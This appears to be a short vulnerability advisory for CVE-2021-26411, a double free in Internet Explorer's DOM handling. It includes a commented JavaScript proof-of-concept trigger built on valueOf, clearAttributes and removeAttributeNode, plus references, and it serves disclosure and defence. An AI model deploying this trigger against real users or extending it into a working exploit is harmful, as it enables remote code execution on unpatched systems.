
Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)

Internet Explorer contains a double free vulnerability in its handling of DOM objects. An attacker can exploit it by luring a user into opening a malicious link or file; successful exploitation leads to remote code execution, giving the attacker control of the user's system. Details of the vulnerability have been published and exploitation in the wild has been detected.

A detailed write-up of the vulnerability is available at: https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html

PoC:

<script>
// Create an element and two attribute nodes. attr1 will carry a JavaScript
// object whose valueOf() callback IE invokes while the attribute is being removed.
var elem = document.createElement('xxx');
var attr1 = document.createAttribute('yyy');
var attr2 = document.createAttribute('zzz');

var obj = {};
obj.valueOf = function() {
        // This callback runs while removeAttributeNode() is still operating on attr1.
        // Clearing all attributes here releases the attribute early; the caller then
        // releases the same object again after the callback returns (the double free).
        elem.clearAttributes();
        return 0x1337;
};

attr1.nodeValue = obj;
attr2.nodeValue = 123;
elem.setAttributeNode(attr1);
elem.setAttributeNode(attr2);
elem.removeAttributeNode(attr1); // triggers valueOf() above and the double free
</script>

References:

  • https://msrc.microsoft.com/updat ... lity/CVE-2021-26411
  • https://nvd.nist.gov/vuln/detail/CVE-2021-26411
  • https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html